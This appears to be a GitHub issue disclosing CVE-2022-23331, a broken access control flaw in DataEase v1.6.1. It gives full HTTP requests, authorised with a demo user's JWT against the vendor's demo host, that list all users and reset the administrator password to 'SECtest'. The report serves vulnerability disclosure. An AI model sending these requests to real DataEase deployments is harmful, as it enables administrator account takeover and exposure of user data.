Headline
CVE-2022-23331: Security Issues[Bug] · Issue #1618 · dataease/dataease
In DataEase v1.6.1, an authenticated user can gain unauthorized access to all user information and can change the administrator password.
DataEase 版本
v1.6.1
浏览器版本
Chrome 96.0.4664.110
Bug 描述
I found an Broken Access Control vulnerability
An authenticated user can access information about all users and change admin password
Bug 重现步骤(有截图更好)
- use demo login
- this api access information about all users
···
POST /api/user/userGrid/1/10 HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, /
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 13
{"orders":[]}
···
- this api change admin password
···
POST /api/user/adminUpdatePwd HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, /
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 36
{"userId":1,"newPassword":"SECtest"}
···
now you can use admin/SECtest login